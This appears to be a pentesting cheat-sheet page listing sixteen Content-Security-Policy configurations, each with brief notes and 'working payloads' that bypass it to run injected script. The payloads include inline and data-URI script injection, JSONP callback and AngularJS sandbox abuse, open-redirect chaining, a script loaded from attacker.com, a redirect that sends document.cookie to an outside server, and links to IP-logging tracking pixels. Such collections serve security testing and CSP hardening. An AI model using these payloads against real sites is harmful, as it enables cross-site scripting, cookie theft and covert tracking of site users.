CSP

CSP Checker

https://csp-evaluator.withgoogle.com/

Content-Security-Policy Header

Below are various Content-Security-Policy configurations with notes and working payloads demonstrating how they may be bypassed or abused. All links and payloads are preserved as in the original content.

1

If upload from web is allowed or

• Links:

  • https://medium.com/@shahjerry33/pixel-that-steals-data-im-invisible-3c938d4c3888

  • https://iplogger.org/invisible/

  • https://iplogger.org/15bZ87

2

Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-inline' https://*; child-src 'none'; report-uri /Report-parsing-url;

By observing this policy we can say it's damn vulnerable and will allow inline scripting as well. The reason behind that is the usage of 'unsafe-inline' source as a value of script-src directive.

Working payload:

payload.html

"/><script>alert(1337);</script>

3

Content-Security-Policy: script-src https://facebook.com https://google.com 'unsafe-eval' data: http://*; child-src 'none'; report-uri /Report-parsing-url;

This is a misconfigured CSP policy due to usage of unsafe-eval.

Working payload:

payload.html

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

4

Content-Security-Policy: script-src 'self' https://facebook.com https://google.com https: data *; child-src 'none'; report-uri /Report-parsing-url;

Misconfigured due to usage of a wildcard in script-src.

Working payloads:

payload1.html

"/>'><script src=https://attacker.com/evil.js></script>

payload2.html

"/>'><script src=data:text/javascript,alert(1337)></script>

5

Content-Security-Policy: script-src 'self' report-uri /Report-parsing-url;

Misconfigured: object-src and default-src are missing.

Working payloads:

payload1.html

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

payload2.html

">'><object type="application/x-shockwave-flash" data='https: //ajax.googleapis.com/ajax/libs/yui/2.8.0 r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e) {alert(1337)}//'>
<param name="AllowScriptAccess" value="always"></object>

6

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' ajax.googleapis.com;

With unsafe-eval enabled we can perform a Client-Side Template Injection attack.

Working examples:

example.html

<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}} </div>
<script src=https://drive.google.com/uc?id=...&export=download></script>

7

Content-Security-Policy: default-src 'self'; script-src 'self' *.googleusercontent.com *.google.com *.yandex.net;

You can upload the payload to the Yandex.Disk storage, copy the download link and replace the content_type parameter value in the link with application/javascript.

Working payload:

payload.html

<script src="https://[***].storage.yandex.net/[...]content_type=application/javascript&[***]"></script>

8

Content-Security-Policy: default-src 'self'

If you are not allowed to connect to any external host, you can send data directly in the URL (query string) by redirecting the user to your web server.

Working payload:

payload.js

window.location='https://deteact.com/'+document.cookie;

9

Content-Security-Policy: script-src 'self'; object-src 'none' ; report-uri /Report-parsing-url;

object-src is set to none but this CSP can be bypassed if the application allows users to upload any file type to the host. An attacker can upload a malicious script file and call it within a tag.

Working payload:

payload.html

"/>'><script src="/user_upload/mypic.png.js"></script>

10

Content-Security-Policy: script-src 'self' https://www.google.com; object-src 'none' ; report-uri /Report-parsing-url;

When script-src allows self and a whitelisted domain like www.google.com, it can be bypassed using JSONP endpoints that allow insecure callbacks.

Working payload:

payload.html

"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>

11

Content-Security-Policy: script-src 'self' https://cdnjs.cloudflare.com/; object-src 'none' ; report-uri /Report-parsing-url;

If script-src allows self and a CDN domain, you can bypass CSP by loading a vulnerable version of a library hosted on that CDN.

Working payloads:

payload1.html

<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script>

payload2.html

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script>
 <div ng-app ng-csp>
  {{ x = $on.curry.call().eval("fetch('http://localhost/index.php').then(d => {})") }}
 </div>

payload3.html

"><script src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>

payload4.html

"><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>

12

Content-Security-Policy: script-src 'self' ajax.googleapis.com; object-src 'none' ;report-uri /Report-parsing-url;

If the application uses AngularJS and scripts are loaded from a whitelisted domain, it may be possible to bypass CSP by leveraging vulnerable AngularJS versions and callback functions.

Working payloads:

payload1.html

ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>

payload2.html

"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>

13

Content-Security-Policy: script-src 'self' accounts.google.com/random/ website.with.redirect.com ; object-src 'none' ; report-uri /Report-parsing-url;

When multiple domains are whitelisted, an open redirect on one of them can be used to reach another whitelisted domain with a JSONP endpoint. The browser validates host but not necessarily the path parameters during redirection, enabling XSS.

Working payload:

payload.html

">'><script src="https://website.with.redirect.com/redirect?url=https%3A//accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>">

14

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' www.googletagmanager.com;

With inline execution enabled via 'unsafe-inline', you can inject code into the page.

Working examples:

payload1.html

url.com/asd.php/?a=<script>alert(document.domain)</scrtipt>

Notes:

• GoogleTagManager examples:

gtm.html

<script>setTimeout(function(){dataLayer.push({event:'gtm.js'})},1000)</script>
<script src="//www.googletagmanager.com/gtm.js?id=GTM-*******"></script>

15

Content-Security-Policy: default-src 'self' data: *; connect-src 'self'; script-src 'self' ;report-uri /_csp; upgrade-insecure-requests

This CSP can be bypassed using iframes if the application allows iframes from a whitelisted domain. Using the srcdoc attribute of an iframe, XSS can be achieved.

Working payloads:

payload1.html

<iframe srcdoc='<script src="data:text/javascript,alert(document.domain)"></script>'></iframe>

Sometimes it can be achieved using defer & async attributes of script within iframe (may fail due to SOP in many browsers):

payload2.html

<iframe src='data:text/html,<script defer="true" src="data:text/javascript,document.body.innerText=/hello/"></script>'></iframe>

16

CSP with policy injection (only Chrome)

Example of policy injection via query:

/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27

Was this helpful?